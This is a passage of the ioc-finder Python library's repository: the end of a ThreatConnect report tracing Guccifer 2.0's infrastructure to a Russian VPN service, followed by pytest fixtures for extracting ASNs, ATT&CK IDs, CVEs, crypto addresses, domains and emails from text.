 55 | In the figure above, the current domain resolution for vpn-service[.]us is seemingly associated with a New York-based registrant named James Dermount, operating under Security and Host Ltd. We can also see this domain was registered in 2004, and was last updated in March of 2015 with an expiration date of 2019.
 56 | 
 57 | When we compare that information with the DomainTools screenshot below of the original 2004 registration, Russia themes continue to emerge. We can see our same New York-based registrant James Dermount, but this time operating under VPN Services Inc. This 2004 record lists the registrant email as sec.service@mail[.]ru, which uses the free Russian webmail service mail.ru and was previously referenced in Russian language forums related to job postings and automobiles. The latter of those forums associates the username “Антон_Харьков” (Anton_Harkov, of the Iron Man franchise) with the email address.
 58 | 
 59 | ThreatConnect Research Guccifer 2.0: All Roads Lead to Russia 4
 60 | The name server used in the 2004 vpn-service[.]us registration is listed as xocma[.]net – also different from the 2016 record. The xocma[.]net domain lists Moscow-based Azer Karyagdy and TK Rustelekom LLC as the registrant name and organization. For more information about leveraging name servers for analysis, see our blog post here.
 61 | 
 62 | ThreatConnect Research Guccifer 2.0: All Roads Lead to Russia 5
 63 | According to DomainTools Historic Whois, in September 2007 the same registrant also registered vpn-security[.]us with the same phone number and a vpn_support@mail[.]ru email account. Finally, the domain vpn-service[.]com also leads to the Elite VPN website and is hosted on the same IP as vpn-service[.]us but was most recently registered using a privacy protection service.
 64 | 
 65 | Getting to Know Russia’s Elite VPN Services
 66 | Browsing to vpn-service[.]us, we find a Russian language webpage for Elite VPN Services. The site mentions that English language support is available via email and ICQ. CORRECTION: The site offers an English language translation when Javascript is enabled in a browser.
 67 | 
 68 | ThreatConnect Research Guccifer 2.0: All Roads Lead to Russia 6
 69 | We created an account on the Elite VPN Service and were able to see which VPN nodes are offered from within France. From here, we confirmed the SSH Fingerprint we identified from Guccifer 2.0’s email is unique to Elite VPN Service. All of the Elite VPN Service nodes offered in their web interface and the IP address used by Guccifer 2.0 to communicate via email returned the same SSH fingerprint.
 70 | 
 71 | It is important to note that the IP address seen in the Guccifer 2.0 AOL communications – 95.130.15[.]34 – is not listed as an option within Elite VPN Service.  Although it has an identical SSH fingerprint and has the exact same port (1723, PPTP) open as the listed options. This demonstrates the server was cloned from the same server image as all the Elite VPN servers but may be a private or dedicated version of the service.
 72 | 
 73 | ThreatConnect Research Guccifer 2.0: All Roads Lead to Russia IPS
 74 | Based on this information, we can confirm that Guccifer 2.0 is using the Russia-based Elite VPN Service, and is able to leverage IP infrastructure that is not available to other users. We cannot identify whether the 95.130.15[.]34 IP address is used exclusively by the individual(s) behind Guccifer 2.0, and consequently any activity associated with the IP address may not be indicative of Guccifer 2.0 activity. The persona’s continued use of the IP address or additional information on Elite VPN’s service offerings could help us identify the extent to which the address is exclusively used by Russian actors. However, for now, the IP itself merits further investigation.
 75 | 
 76 | WHITE PAPER: MATURING A THREAT INTELLIGENCE PROGRAM
 77 | There are no readily available details of known host resolution history for the 95.130.15[.]34 IP; however, we can find incidental evidence that it has been used in previous malicious activity. This activity includes Russian bride scams from October 2014 as well as WordPress bruteforcing in October 2015. Interestingly we also find references to this IP address within a current EDR Coin Cryptocurrency EDRC nodelist.
 78 | 
 79 | ThreatConnect Research Guccifer 2.0: All Roads Lead to Russia 8
 80 | Finally, the Guccifer 2.0 AOL IP Address 95.130.15[.]34 can also be found referenced within an online SMS messaging proxy service which contains a series of Russian language SMS messages that date back to August 2015. The specific message mentioning 95.130.15[.]34 appears to be an automatic message that states that “a text message ‘1’ from www.smsc[.]ru has been scheduled from IP 95.130.15[.]34”. If it turns out that the 95.130.15[.]34 VPN IP is exclusively used by the individuals or organization behind Guccifer 2.0, this previous activity may provide investigative leads that could ferret out additional information on those actors.
 81 | 
 82 | Conclusion:
 83 | ThreatConnect is the first to identify and detail analysis of Guccifer 2.0’s operational infrastructure. In our original hypothesis, we suspected Guccifer 2.0 might be leveraging French infrastructure to communicate with the global media, and we have validated this finding with the help of the media. As more details continue to surface surrounding Guccifer 2.0, we continue to identify heavy traces of Russian activity, from the specific Russian-based VPN service provider, domain registrants, and registrars as well as various discrete events that have circumstantial marks of Russian origins.
 84 | 
 85 | As we pointed out in our previous analysis, we conclude Guccifer 2.0 is an apparition created under a hasty Russian D&D campaign, which has clearly evolved into an Active Measures Campaign. Those who are operating under the Guccifer 2.0 Twitter, WordPress and Email communications are likely made up a cadre of non-technical politruk attempting to establish “Guccifer 2.0” as a static fixture on the world stage along the likes of Manning, Assange or Snowden. Their use of Russian VPN services with French infrastructure may shed light on a method Russian intelligence operatives use — domestic services coupled with foreign infrastructure — to help hide their hand and deter any potential attribution to Russia.
 86 | 
 87 | Guccifer 2.0 has subsequently claimed responsibility, both publicly and privately, for the 19,000+ DNC emails posted on Wikileaks on 22 July, and it appears that his persona is not fading in the run up to the election. The execution of Guccifer 2.0’s campaign thus far is rife with errors that have allowed us to attribute this persona to Russian-based infrastructure.
 88 | 
 89 | Maintaining a ruse of this nature within both the physical and virtual domains requires believable and verifiable events which do not contradict one another. That is not the case here. Our research into Guccifer 2.0’s infrastructure further solidifies our assessment that the persona is a Russia-controlled platform that can act as a censored hacktivist. Moscow determines what Guccifer 2.0 shares and thus can attempt to selectively impact media coverage, and potentially the election, in a way that ultimately benefits their national objectives.
 90 | 
 91 | Update 07/26/2016  4:00pm EDT
 92 | In our initial review of the infrastructure that the Russian persona Guccifer 2.0 used to communicate with journalists, we identified that they had used a Russian VPN service to connect to the France-based IP address 95.130.15[.]34. We assessed that this activity indicated the Russian actors behind Guccifer 2.0 probably use the Russian VPN as part of their security practices on a regular basis. At the time we also hypothesized that the French IP may be exclusive to the actors behind Guccifer 2.0 actors, but could not confirm that as we would need additional information to make such a determination. Thankfully, Joe Uchill with The Hill, who has previously covered Guccifer 2.0 and the Wikileaks DNC data dump, has provided us with redacted information on his communications with Guccifer 2.0 that has raised our confidence in our current assessments and hypotheses.
 93 | 
 94 | Check out Joe’s story here.
 95 | 
 96 | One email from Guccifer 2.0 leveraged ProtonMail, a free encrypted email client. Analyzing a second, more recent email from Guccifer 2.0 in the ThreatConnect platform, we were able to identify that the actors behind the Guccifer 2.0 persona used a 1&1 mail.com email address to send an encrypted email message from the same French IP (95.130.15[.]34). This communication occurred over a week after the email referenced in our initial review. These findings, which have been shared in ThreatConnect, have implications for two of our previous assessments:
 97 | 
 98 | guccifer-update-russia-dnc
 99 |  
100 | 
101 | Elite VPN Part of Russian OPSEC
102 | 
103 | Using the same IP address with a different email address several days later suggests that the actors behind Guccifer 2.0 have operational security (OPSEC) procedures in place to specifically use the Russian Elite VPN service. This raises our confidence in our assessment that using the Elite VPN service is a practice that the actors behind Guccifer 2.0 leverage in an effort to hide their true identities. Their repeated use of the French IP address suggests that the Russian actors also have an OPSEC practice in place to connect to that specific IP address, rather than using infrastructure from other locations.
104 | 
105 | Exclusivity to Russian Actors
106 | 
107 | Their continued use of this IP, coupled with the fact that it is not available for other Elite VPN users, strengthens –but does not confirm– the notion that the IP is exclusively used by the Russian actors behind Guccifer 2.0. If connecting to this specific IP is a part of their OPSEC, then the Russian actors probably would have procured VPN services with this IP address for their sole use. By doing so, they could ensure that the services at that IP would not be overburdened by other users.
108 | 
109 | Conclusion
110 | 
111 | These actors’ consistent use of the Russian Elite VPN service is just another indicator that Guccifer 2.0 is not who or what he claims to be. There is still not enough evidence to confirm that this French IP is used exclusively by the individuals behind Guccifer 2.0. However, if it can be verified that the 95.130.15[.]34 VPN IP is exclusively used by the individuals or organization behind Guccifer 2.0, there are some significant leads — phone numbers, websites, and previous malicious activity — that may help us identify more information about those actors. Finally, as the actors behind Guccifer 2.0 continue to develop the persona, we would expect to see the their OPSEC practices similarly develop to reduce the amount of visibility we can gain into their operations.
112 | 
113 | Read the full series of ThreatConnect posts following the DNC Breach: “Rebooting Watergate: Tapping into the Democratic National Committee“, “Shiny Object? Guccifer 2.0 and the DNC Breach“, “What’s in a Name Server?“, “Guccifer 2.0: the Man, the Myth, the Legend?“, “Guccifer 2.0: All Roads Lead to Russia“, “FANCY BEAR Has an (IT) Itch that They Can’t Scratch“, “Does a BEAR Leak in the Woods?“, “Russian Cyber Operations on Steroids“, and “Can a BEAR Fit Down a Rabbit Hole?“.
114 | 
115 | 
116 | 


--------------------------------------------------------------------------------
/tests/find_iocs_cases/__init__.py:
--------------------------------------------------------------------------------
 1 | from .asns import ASN_DATA
 2 | from .attack_data import ATTACK_DATA
 3 | from .coins import COIN_DATA
 4 | from .cves import CVE_DATA
 5 | from .domains import DOMAIN_DATA
 6 | from .email import EMAIL_DATA
 7 | from .feature__included_ioc_types import individual_included_ioc_types_tests, multiple_included_ioc_types_tests
 8 | from .file_paths import PATH_DATA
 9 | from .hashes import HASH_DATA
10 | from .ids import ID_DATA
11 | from .ip_addr import IP_DATA
12 | from .mac_addr import MAC_DATA
13 | from .registry_keys import REGISTRY_DATA
14 | from .tlp_labels import TLP_DATA
15 | from .urls import URL_DATA
16 | from .user_agents import UA_DATA
17 | 
18 | cases = [
19 |     TLP_DATA,
20 |     individual_included_ioc_types_tests,
21 |     multiple_included_ioc_types_tests,
22 |     DOMAIN_DATA,
23 |     EMAIL_DATA,
24 |     HASH_DATA,
25 |     CVE_DATA,
26 |     IP_DATA,
27 |     ASN_DATA,
28 |     ATTACK_DATA,
29 |     REGISTRY_DATA,
30 |     PATH_DATA,
31 |     ID_DATA,
32 |     COIN_DATA,
33 |     MAC_DATA,
34 |     URL_DATA,
35 |     UA_DATA,
36 | ]
37 | 
38 | ALL_TESTS = [val for sublist in cases for val in sublist]
39 | 


--------------------------------------------------------------------------------
/tests/find_iocs_cases/asns.py:
--------------------------------------------------------------------------------
 1 | from pytest import param
 2 | 
 3 | ASN_DATA = [
 4 |     param("as1234", {"asns": ["ASN1234"]}, {}, id="asn_1"),
 5 |     param("asn1234", {"asns": ["ASN1234"]}, {}, id="asn_2"),
 6 |     param("asn 1234", {"asns": ["ASN1234"]}, {}, id="asn_3"),
 7 |     param("AS1234", {"asns": ["ASN1234"]}, {}, id="asn_4"),
 8 |     param("AS 1234", {"asns": ["ASN1234"]}, {}, id="asn_5"),
 9 |     param("ASN 1234", {"asns": ["ASN1234"]}, {}, id="asn_6"),
10 |     param('here is an asn: "AS1234', {"asns": ["ASN1234"]}, {}, id="asn_7"),
11 |     param("NWD2HUBCAS1234.ad.analog.com", {"domains": ["nwd2hubcas1234.ad.analog.com"]}, {}, id="asn_8"),
12 |     param("here is an asn: AS1234foobar", {}, {}, id="asn_9"),
13 |     param("as1234", {"asns": ["ASN1234"]}, {}, id="asn_10"),
14 |     param("just as 2014", {}, {}, id="asn_11"),
15 | ]
16 | 


--------------------------------------------------------------------------------
/tests/find_iocs_cases/attack_data.py:
--------------------------------------------------------------------------------
 1 | from pytest import param
 2 | 
 3 | ATTACK_DATA = [
 4 |     param(
 5 |         """Mitigations: 41
 6 |         ID  Name    Description
 7 |         M1036   Account Use Policies
 8 |         Configure features related to account use like login attempt lockouts, specific login times, etc.
 9 | 
10 |         M1015   Active Directory Configuration
11 |         Configur""",
12 |         {"attack_mitigations": {"enterprise": ["M1036", "M1015"]}},
13 |         {},
14 |         id="attack_data_1",
15 |     ),
16 |     param(
17 |         """ Name    Description
18 |         M1013   Application Developer Guidance
19 |         This mitigation describes any guidance or training given to developers of applications to avoid introducing security weaknesses that an adversary may be able to take advantage of.
20 | 
21 |         M1005   Application Vetting
22 |         Enterprises can vet applications for exploitable vulnerabilities or unwanted (privacy-invasive or malicious) behaviors. Enterprises can inspect appl""",
23 |         {"attack_mitigations": {"enterprise": ["M1013"], "mobile": ["M1013", "M1005"]}},
24 |         {},
25 |         id="attack_data_2",
26 |     ),
27 |     param(
28 |         """
29 |         ID  Name    Description
30 |         T1329   Acquire and/or use 3rd party infrastructure services
31 |         A wide variety of cloud, virtual private services, hosting, compute, and storage solutions are available. Additionally botnets are available for rent or purchase. Use of these solutions allow an adversary to stage, launch, and execute an attack from infrastructure that does not physically tie back to them and can be rapidly provisioned, modified, and shut down.
32 | 
33 |         T1307   Acquire and/or use 3rd party infrastructure services
34 |         A wide variety of cloud, virtual private services, hosting, compute, and storage solutions are available. Additionally botnets are available for rent or purchase. Use of these solutions allow an adversary to stage, launch, and execute an attack from infrastructure that does not physically tie back to them and can be rapidly provisioned, modified, and shut down.
35 | 
36 |         T1308""",
37 |         {"attack_techniques": {"pre_attack": ["T1329", "T1307", "T1308"]}},
38 |         {},
39 |         id="attack_pattern_3",
40 |     ),
41 |     param(
42 |         """
43 |         ID  Name    Description
44 |         TA0012  Priority Definition Planning    Priority definition planning consists of the process of determining the set of Key Intelligence Topics (KIT) or Key Intelligence Questions (KIQ) required for meeting key strategic, operational, or tactical goals. Leadership outlines the priority definition (may be considered a goal) around which the adversary designs target selection and a plan to achieve. An analyst may outline the priority definition when in the course of determining gaps in existing KITs or KIQs.
45 |         TA0013  Priority Definition Direction   Priority definition direction consists of the process of collecting and assigning requirements for meeting Key Intelligence Topics (KIT) or Key Intelligence Questions (KIQ) as determined by leadership.
46 |         TA0014  Targ""",
47 |         {"attack_tactics": {"pre_attack": ["TA0012", "TA0013", "TA0014"]}},
48 |         {},
49 |         id="attack_pattern_4",
50 |     ),
51 |     param("""FOOT1329""", {}, {}, id="attack_pattern_5"),
52 |     param("""T1329FUN""", {}, {}, id="attack_pattern_6"),
53 |     param("""foot1329""", {}, {}, id="attack_pattern_7"),
54 |     param("""t1329""", {"attack_techniques": {"pre_attack": ["T1329"]}}, {}, id="attack_pattern_8"),
55 |     param("T1156", {"attack_techniques": {"enterprise": ["T1156"]}}, {}, id="attack_pattern_9"),
56 |     param("AT0001", {}, {}, id="attack_pattern_10"),
57 |     param("TA0001FUN", {}, {}, id="attack_pattern_11"),
58 |     param("foota0001", {}, {}, id="attack_pattern_12"),
59 |     param("ta0001", {"attack_tactics": {"enterprise": ["TA0001"]}}, {}, id="attack_pattern_13"),
60 |     param(
61 |         "https://attack.mitre.org/tactics/TA0001/",
62 |         {
63 |             "attack_tactics": {"enterprise": ["TA0001"]},
64 |             "urls": ["https://attack.mitre.org/tactics/TA0001/"],
65 |             "domains": ["attack.mitre.org"],
66 |         },
67 |         {},
68 |         id="attack_pattern_14",
69 |     ),
70 |     param("T1546.004", {"attack_techniques": {"enterprise": ["T1546.004"]}}, {}, id="attack_pattern_15"),
71 |     param("T1156.0012", {}, {}, id="attack_pattern_16"),
72 | ]
73 | 


--------------------------------------------------------------------------------
/tests/find_iocs_cases/coins.py:
--------------------------------------------------------------------------------
 1 | from pytest import param
 2 | 
 3 | COIN_DATA = [
 4 |     param(
 5 |         """1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2.
 6 |         P2SH type starting with the number 3, eg: 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy.
 7 |         Bech32 type starting with bc1, eg: bc1qar0srrr7xfkvy5l643lydnw9re59gtzzwf5mdq""",
 8 |         {
 9 |             "bitcoin_addresses": [
10 |                 "1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2",
11 |                 "3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy",
12 |                 "bc1qar0srrr7xfkvy5l643lydnw9re59gtzzwf5mdq",
13 |             ]
14 |         },
15 |         {},
16 |         id="bitcoin_address_1",
17 |     ),
18 |     param(
19 |         """1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2.
20 |         P2SH type starting with the number 3, eg: 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy.
21 |         Bech32 type starting with bc1, eg: bc1qar0srrr7xfkvy5l643lydnw9re59gtzzwf5mdq""",
22 |         {
23 |             "bitcoin_addresses": [
24 |                 "1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2",
25 |                 "3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy",
26 |                 "bc1qar0srrr7xfkvy5l643lydnw9re59gtzzwf5mdq",
27 |             ]
28 |         },
29 |         {},
30 |         id="bitcoin_address_1",
31 |     ),
32 |     param(
33 |         """1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2.
34 |         P2SH type starting with the number 3, eg: 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy.
35 |         Bech32 type starting with bc1, eg: bc1qar0srrr7xfkvy5l643lydnw9re59gtzzwf5mdq""",
36 |         {
37 |             "bitcoin_addresses": [
38 |                 "1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2",
39 |                 "3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy",
40 |                 "bc1qar0srrr7xfkvy5l643lydnw9re59gtzzwf5mdq",
41 |             ]
42 |         },
43 |         {},
44 |         id="bitcoin_address_1",
45 |     ),
46 |     param(
47 |         """1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2.
48 |         P2SH type starting with the number 3, eg: 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy.
49 |         Bech32 type starting with bc1, eg: bc1qar0srrr7xfkvy5l643lydnw9re59gtzzwf5mdq""",
50 |         {
51 |             "bitcoin_addresses": [
52 |                 "1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2",
53 |                 "3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy",
54 |                 "bc1qar0srrr7xfkvy5l643lydnw9re59gtzzwf5mdq",
55 |             ]
56 |         },
57 |         {},
58 |         id="bitcoin_address_1",
59 |     ),
60 |     param(
61 |         "496aKKdqF1xQSSEzw7wNrkZkDUsCD5cSmNCfVhVgEps52WERBcLDGzdF5UugmFoHMm9xRJdewvK2TFfAJNwEV25rTcVF5Vp",
62 |         {
63 |             "monero_addresses": [
64 |                 "496aKKdqF1xQSSEzw7wNrkZkDUsCD5cSmNCfVhVgEps52WERBcLDGzdF5UugmFoHMm9xRJdewvK2TFfAJNwEV25rTcVF5Vp"
65 |             ]
66 |         },
67 |         {},
68 |         id="monero_1",
69 |     ),
70 |     param(
71 |         "49Bmp3SfddJRRGNW7GhHyAA2JgcYmZ4EGEix6p3eMNFCd15P2VsK9BHWcZWUNYF3nhf17MoRTRK4j5b7FUMA9zanSn9D3Nk 498s2XeKWYSEhQHGxdMULWdrpaKvSkDsq4855mCuksNL6ez2dk4mMQm8epbr9xvn5LgLPzD5uL9EGeRqWUdEZha1HmZqcyh",
72 |         {
73 |             "monero_addresses": [
74 |                 "49Bmp3SfddJRRGNW7GhHyAA2JgcYmZ4EGEix6p3eMNFCd15P2VsK9BHWcZWUNYF3nhf17MoRTRK4j5b7FUMA9zanSn9D3Nk",
75 |                 "498s2XeKWYSEhQHGxdMULWdrpaKvSkDsq4855mCuksNL6ez2dk4mMQm8epbr9xvn5LgLPzD5uL9EGeRqWUdEZha1HmZqcyh",
76 |             ]
77 |         },
78 |         {},
79 |         id="monero_2",
80 |     ),
81 | ]
82 | 


--------------------------------------------------------------------------------
/tests/find_iocs_cases/cves.py:
--------------------------------------------------------------------------------
 1 | from pytest import param
 2 | 
 3 | CVE_DATA = [
 4 |     param(
 5 |         "cve-2014-1000 cve 2014-1001 cve-1999-1002 CVE 2999-1003 CVE 1928-1004",
 6 |         {"cves": ["CVE-2014-1000", "CVE-2014-1001", "CVE-1999-1002", "CVE-2999-1003", "CVE-1928-1004"]},
 7 |         {},
 8 |         id="cve_1",
 9 |     )
10 | ]
11 | 


--------------------------------------------------------------------------------
/tests/find_iocs_cases/domains.py:
--------------------------------------------------------------------------------
 1 | from pytest import param
 2 | 
 3 | DOMAIN_DATA = [
 4 |     param(
 5 |         "this is just a (google.com) test of example.com", {"domains": ["google.com", "example.com"]}, {}, id="domain_1"
 6 |     ),
 7 |     param(
 8 |         "https://asf.goole.com/mail?url=http%3A%2F%2Ffreasdfuewriter.com%2Fcs%2Fimage%2FCommerciaE.jpg&t=1575955624&ymreqid=733bc9eb-e8f-34cb-1cb5-120010019e00&sig=x2Pa2oOYxanG52s4vyCEFg--~Chttp://uniddloos.zddfdd.org/CBA0019_file_00002_pdf.zip",
 9 |         {
10 |             "domains": ["asf.goole.com", "cba0019_file_00002_pdf.zip", "freasdfuewriter.com", "uniddloos.zddfdd.org"],
11 |             "urls": [
12 |                 "https://asf.goole.com/mail?url=http%3A%2F%2Ffreasdfuewriter.com%2Fcs%2Fimage%2FCommerciaE.jpg&t=1575955624&ymreqid=733bc9eb-e8f-34cb-1cb5-120010019e00&sig=x2Pa2oOYxanG52s4vyCEFg--~Chttp://uniddloos.zddfdd.org/CBA0019_file_00002_pdf.zip",
13 |             ],
14 |         },
15 |         {},
16 |         id="domain-issue_104__domains_read_from_percent_encoded_url_query_params",
17 |     ),
18 |     param(
19 |         "https://asf.goole.com/mail?url=http%3A%2F%2Ffreasdfuewriter.com%2Fcs%2Fimage%2FCommerciaE.jpg&t=1575955624&ymreqid=733bc9eb-e8f-34cb-1cb5-120010019e00&sig=x2Pa2oOYxanG52s4vyCEFg--~Chttp://uniddloos.zddfdd.org/CBA0019_file_00002_pdf.zip",
20 |         {
21 |             "urls": [
22 |                 "https://asf.goole.com/mail?url=http%3A%2F%2Ffreasdfuewriter.com%2Fcs%2Fimage%2FCommerciaE.jpg&t=1575955624&ymreqid=733bc9eb-e8f-34cb-1cb5-120010019e00&sig=x2Pa2oOYxanG52s4vyCEFg--~Chttp://uniddloos.zddfdd.org/CBA0019_file_00002_pdf.zip",
23 |             ],
24 |             "domains": ["cba0019_file_00002_pdf.zip", "freasdfuewriter.com", "uniddloos.zddfdd.org"],
25 |         },
26 |         {"parse_domain_from_url": False},
27 |         id="domain-issue_104__domains_read_from_percent_encoded_url_query_params__with_options_false",
28 |     ),
29 |     param(
30 |         "https://asf.goole.com/mail?url=http%3A%2F%2Ffreasdfuewriter.com%2Fcs%2Fimage%2FCommerciaE.jpg&t=1575955624&ymreqid=733bc9eb-e8f-34cb-1cb5-120010019e00&sig=x2Pa2oOYxanG52s4vyCEFg--~Chttp://uniddloos.zddfdd.org/CBA0019_file_00002_pdf.zip",
31 |         {
32 |             "domains": ["asf.goole.com", "cba0019_file_00002_pdf.zip", "freasdfuewriter.com", "uniddloos.zddfdd.org"],
33 |             "urls": [
34 |                 "https://asf.goole.com/mail?url=http%3A%2F%2Ffreasdfuewriter.com%2Fcs%2Fimage%2FCommerciaE.jpg&t=1575955624&ymreqid=733bc9eb-e8f-34cb-1cb5-120010019e00&sig=x2Pa2oOYxanG52s4vyCEFg--~Chttp://uniddloos.zddfdd.org/CBA0019_file_00002_pdf.zip",
35 |             ],
36 |         },
37 |         {"parse_from_url_path": False},
38 |         id="domain-issue_104__domains_read_from_percent_encoded_url_query_params__with_options_false_2",
39 |     ),
40 |     param(
41 |         "%2Ffreasdfuewriter.com",
42 |         {"domains": ["2ffreasdfuewriter.com"]},
43 |         {},
44 |         id="domain-percent_encoding_not_unquoted_if_not_in_url",
45 |     ),
46 |     param(
47 |         "freasdfuewriter.com%2F",
48 |         {"domains": ["freasdfuewriter.com"]},
49 |         {},
50 |         id="domain-percent_encoding_not_unquoted_if_not_in_url_2",
51 |     ),
52 |     # See https://github.com/fhightower/ioc-finder/issues/91.
53 |     param(
54 |         "1.1.1.1/0 foobar.com/test/bingo.php",
55 |         {
56 |             "urls": ["foobar.com/test/bingo.php"],
57 |             "domains": ["foobar.com"],
58 |             "ipv4_cidrs": ["1.1.1.1/0"],
59 |             "ipv4s": ["1.1.1.1"],
60 |         },
61 |         {},
62 |         id="url_cidr_1",
63 |     ),
64 | ]
65 | 


--------------------------------------------------------------------------------
/tests/find_iocs_cases/email.py:
--------------------------------------------------------------------------------
 1 | from pytest import param
 2 | 
 3 | EMAIL_DATA = [
 4 |     param(
 5 |         "a@example.com test@a.com bingo@en.wikipedia.com foo@a.com'.format('a'*63 bar@b.a.com'.format('a'*63, 'a'*63 bad@test-ing.com me@2600.com john.smith(comment)@example.com (comment)john.smith@example.com \"John..Doe\"@example.com' test@[192.168.0.1]",
 6 |         {
 7 |             "email_addresses": [
 8 |                 "a@example.com",
 9 |                 "bad@test-ing.com",
10 |                 "bar@b.a.com",
11 |                 "bingo@en.wikipedia.com",
12 |                 "foo@a.com",
13 |                 "john.smith@example.com",
14 |                 "me@2600.com",
15 |                 "test@[192.168.0.1]",
16 |                 "test@a.com",
17 |             ],
18 |             "email_addresses_complete": [
19 |                 "a@example.com",
20 |                 "test@a.com",
21 |                 "bingo@en.wikipedia.com",
22 |                 "foo@a.com",
23 |                 "bar@b.a.com",
24 |                 "bad@test-ing.com",
25 |                 "me@2600.com",
26 |                 "john.smith(comment)@example.com",
27 |                 "(comment)john.smith@example.com",
28 |                 '"John..Doe"@example.com',
29 |                 "test@[192.168.0.1]",
30 |             ],
31 |             "ipv4s": ["192.168.0.1"],
32 |             "domains": ["a.com", "en.wikipedia.com", "b.a.com", "test-ing.com", "2600.com", "example.com"],
33 |         },
34 |         {},
35 |         id="email_1",
36 |     ),
37 |     param(
38 |         "foo@swissjabber.de bar@jabber.zone bom@jabber.sow.as me@example.com",
39 |         {
40 |             "xmpp_addresses": ["foo@swissjabber.de", "bar@jabber.zone", "bom@jabber.sow.as"],
41 |             "domains": ["swissjabber.de", "jabber.zone", "jabber.sow.as", "example.com"],
42 |             "email_addresses": ["me@example.com"],
43 |             "email_addresses_complete": ["me@example.com"],
44 |         },
45 |         {},
46 |         id="xmpp_1",
47 |     ),
48 |     param(
49 |         "foo@swissjabber.de bar@jabber.zone bom@jabber.sow.as me@example.com",
50 |         {
51 |             "xmpp_addresses": ["foo@swissjabber.de", "bar@jabber.zone", "bom@jabber.sow.as"],
52 |             "email_addresses": ["me@example.com"],
53 |             "email_addresses_complete": ["me@example.com"],
54 |         },
55 |         {"parse_domain_name_from_xmpp_address": False, "parse_domain_from_email_address": False},
56 |         id="xmpp_2",
57 |     ),
58 | ]
59 | 


--------------------------------------------------------------------------------
/tests/find_iocs_cases/feature__included_ioc_types.py:
--------------------------------------------------------------------------------
  1 | """These tests make sure the included_ioc_types parameter is working properly.
  2 | 
  3 | Each test below passes a string with two IOC types into the find_iocs function, but only specifies one `included_ioc_types` argument to ensure it is handled properly."""
  4 | 
  5 | from pytest import param
  6 | 
  7 | from ioc_finder.ioc_finder import DEFAULT_IOC_TYPES
  8 | 
  9 | IOC_EXAMPLES = {
 10 |     "domains": ["abc.py", "bar.com", "example.com", "foo.com", "swissjabber.de"],
 11 |     "urls": ["https://example.com/test%20page/foo.com/bingo.php?q=bar.com"],
 12 |     "xmpp_addresses": ["foo@swissjabber.de"],
 13 |     "email_addresses_complete": ["me@example.com"],
 14 |     "email_addresses": ["me@example.com"],
 15 |     "ipv4_cidrs": ["1.1.1.1/0"],
 16 |     "imphashes": ["18ddf28a71089acdbab5038f58044c0a"],
 17 |     "authentihashes": ["3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4"],
 18 |     "ipv4s": ["1.1.1.1"],
 19 |     "ipv6s": ["2001:0db8:0000:0000:0000:ff00:0042:8329"],
 20 |     "sha512s": ["a" * 128],
 21 |     "sha256s": ["a" * 64],
 22 |     "sha1s": ["a" * 40],
 23 |     "md5s": ["a" * 32],
 24 |     "ssdeeps": [
 25 |         "12288:QYV6MorX7qzuC3QHO9FQVHPF51jgcSj2EtPo/V7I6R+Lqaw8i6hG0:vBXu9HGaVHh4Po/VU6RkqaQ6F",
 26 |         "0000:0000:ff00",
 27 |         "2001:0db8:0000",
 28 |     ],  # I don't like that the components of an ipv6 can be parsed as an ssdeep... I've ticketed this here: https://github.com/fhightower/ioc-finder/issues/228
 29 |     "asns": ["ASN123"],
 30 |     "cves": ["CVE-2022-1234"],
 31 |     "registry_key_paths": [r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows"],
 32 |     "google_adsense_publisher_ids": ["pub-1234567891234567"],
 33 |     "google_analytics_tracker_ids": ["UA-000000-1"],
 34 |     "bitcoin_addresses": ["18ddf28a71089acdbab5038f58044c0a", "3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy"],
 35 |     "monero_addresses": [
 36 |         "496aKKdqF1xQSSEzw7wNrkZkDUsCD5cSmNCfVhVgEps52WERBcLDGzdF5UugmFoHMm9xRJdewvK2TFfAJNwEV25rTcVF5Vp"
 37 |     ],
 38 |     "mac_addresses": ["AA-F2-C9-A6-B3-4F"],
 39 |     "user_agents": [
 40 |         "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1) TLP"
 41 |     ],  # I don't like this parsing... I've ticketed this for improvement here: https://github.com/fhightower/ioc-finder/issues/227
 42 |     "tlp_labels": ["TLP:RED"],
 43 |     "mac_addresses": ["AA-F2-C9-A6-B3-4F"],
 44 |     "file_paths": ["~/foo/bar/abc.py"],
 45 |     "attack_mitigations": {"enterprise": ["M1036", "M1015"]},
 46 |     "attack_tactics": {"pre_attack": ["TA0012"]},
 47 |     "attack_techniques": {"pre_attack": ["T1329"]},
 48 | }
 49 | all_ioc_text = " ".join([val for sublist in IOC_EXAMPLES.values() for val in sublist])
 50 | 
 51 | # this is a hack to be fixed in https://github.com/fhightower/ioc-finder/issues/224
 52 | # imphashes and authentihashes require the hash to be prefixed with `imphash` and `authentihash` respectively, but when parsed, only the hash itself will be present
 53 | all_ioc_text = all_ioc_text.replace(IOC_EXAMPLES["imphashes"][0], f'imphash {IOC_EXAMPLES["imphashes"][0]}')  # type: ignore
 54 | all_ioc_text = all_ioc_text.replace(
 55 |     IOC_EXAMPLES["authentihashes"][0], f'authentihash {IOC_EXAMPLES["authentihashes"][0]}'  # type: ignore
 56 | )
 57 | all_ioc_text = all_ioc_text.replace(IOC_EXAMPLES["user_agents"][0], IOC_EXAMPLES["user_agents"][0].rstrip(" TLP"))  # type: ignore
 58 | # add the attack data
 59 | all_ioc_text = all_ioc_text + " " + " ".join(IOC_EXAMPLES["attack_mitigations"]["enterprise"])  # type: ignore
